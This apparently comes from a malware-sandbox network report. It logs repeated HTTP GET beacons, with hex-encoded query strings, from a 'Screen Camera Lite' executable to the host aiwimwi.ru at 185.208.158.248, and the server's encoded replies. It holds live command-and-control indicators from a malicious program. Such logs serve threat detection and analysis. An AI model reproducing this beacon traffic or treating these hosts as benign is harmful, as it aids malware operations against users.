                                                            Data Ascii: 40067b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592deb765bb374f067b73256c0e0d50eca42cd7db01bfd328838e316b867c75aa5ea4ee75b7f43ec2f66943d798cff12deed909925c96a9c13d8508f21b159adea593fec7bd7e37ebc85ecd54ae635cf132b5f5b3ee124761667b9e887ff862d51ed5a7e3ffc2b43f3f9f98afc347aa4ed479982fe642512a369e99bd5b364d86104283164a756c9d5b3382dbcd70fbc01a7a333b2c0cb30742106d12ee913eccfbf014fcc3d12c25fdef3639d26be9440a4e1cea9c13a3dbf7dbee70b9ba0bc7859a199f522ace087861af315ea528a4e6ccfb5cafcdc4c79a490f038ac77970e37a828d538dd9f0bcf58ab36020257cdc96c5f33586685fc8e212e675116cbdcb01216e3d1b1e3dc347f7bec3787dc070b4283abc2025245d0787f5f334ee3dad3cbf8d4519c22684ee07d348a22b3cf93748b51c492211a156099fe80e81005a22f8ad819720adf29cdf4981677307883340ae956427e678647dbb1a1f935a3d8dc11578433ca415787b6d765d25a32b376e3282ead66845203cea3aca46aa7c007914fc8dcca4fb311b244ebafb26391ad2eaa2f3e0d3fc29d7918e8bfcd4e6ce1243b2a1418c97fef03fd70ce1e8af9969e5da804cdd8df807a4d912031f6dc01920a0a004ad [TRUNCATED]
                                                            Oct 7, 2024 03:42:00.804229975 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:01.054673910 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:01.163775921 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:01.407448053 CEST1088INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 33 37 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 63 38 66 63 66 66 35 31 65 31 39 65 62 62 64 35 35 65 39 30 33 63 61 66 66 38 64 65 37 39 35 38 37 34 64 38 30 34 37 64 31 65 34 64 63 32 61 33 30 61 31 35 32 66 66 64 36 63 64 30 37 32 39 65 39 37 64 35 39 61 64 37 35 66 36 36 63 61 38 33 32 35 33 64 65 66 63 64 33 30 62 64 65 34 31 63 38 37 65 61 65 31 34 66 61 33 39 38 66 32 36 65 34 31 30 61 64 36 31 63 35 34 64 62 38 65 35 35 30 65 63 35 61 37 61 35 64 65 62 32 31 36 64 39 36 33 62 36 37 38 65 66 34 31 37 63 35 66 31 39 37 39 62 32 35 63 66 36 65 39 32 30 38 64 39 35 30 38 62 32 30 62 37 35 39 62 33 65 39 35 34 32 37 65 38 36 35 64 30 66 63 36 37 62 64 38 61 66 31 64 33 34 63 65 63 33 66 63 39 31 36 33 35 35 36 35 63 32 35 66 64 32 37 37 33 31 36 36 37 62 66 65 66 39 33 66 66 38 37 32 34 35 62 65 37 35 63 37 62 32 31 66 35 32 62 35 61 66 66 65 32 65 36 38 66 66 63 32 30 37 61 61 30 65 63 35 39 39 33 38 35 66 31 37 66 32 37 31 [TRUNCATED]
                                                            Data Ascii: 37067b69c953804b26b565fe95b321bd19a55fc8fcff51e19ebbd55e903caff8de795874d8047d1e4dc2a30a152ffd6cd0729e97d59ad75f66ca83253defcd30bde41c87eae14fa398f26e410ad61c54db8e550ec5a7a5deb216d963b678ef417c5f1979b25cf6e9208d9508b20b759b3e95427e865d0fc67bd8af1d34cec3fc91635565c25fd27731667bfef93ff87245be75c7b21f52b5affe2e68ffc207aa0ec599385f17f2713bd63e79ad5b065d375042e317aae56c8d7a8392ebac207ba1ebfa12cb9c4ca2e752f0dd931eb13eedabd0651d33c12da57dbf67d9c25bf9c5ca2e2d0a3c13f25a07db4f30898a3a2725aa38df521adfe8e821af313e444864b72cdb6c9f7db4a67a192ec3db1728d1136a927ca3fd49501cb5db53a0c1e4fc8d76c423a54649bfd8a2f26654f10cfc9b0171be3d4b8f7d934617ae7378fc7050b4b9cafc01d4d42ca7c71532d4cebdbd6ccf0ca589d356e50ff7c3d9c29b3c68d7e8250ca88201c0b6a9cfe9cf4190faf318bdd1b6d01de36c6f09108763e78992b03e854587c638052dbbfabed31a3d1c91353932fc946488cb7d07bd0533dbd6be22d26b865885103cea0a5b069a4de05984dd6decb7b0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449776185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:01.545104027 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:02.230324984 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449782185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:02.410440922 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:03.107878923 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449788185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:03.231547117 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:03.949457884 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.449794185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:04.075114965 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:04.766669989 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449800185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:04.888660908 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:05.588555098 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.449806185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:05.716468096 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:06.406331062 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.449812185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:06.528795004 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:07.223495960 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.449818185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:07.360582113 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:08.069431067 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:08.178628922 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:08.426958084 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.449827185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:08.544418097 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:09.260485888 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.449832185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:09.387324095 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:10.075603962 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.449837185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:10.201489925 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:10.887078047 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.449842185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:11.012134075 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:11.728082895 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:11.835010052 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:12.076751947 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.449852185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:12.200057030 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:12.952456951 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.449857185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:13.074764967 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:13.772974014 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.449863185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:13.919517994 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:14.638581038 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.449869185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:14.762514114 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:15.469583035 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.449876185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:15.590473890 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:16.318367004 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.449883185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:16.487834930 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:17.183614016 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


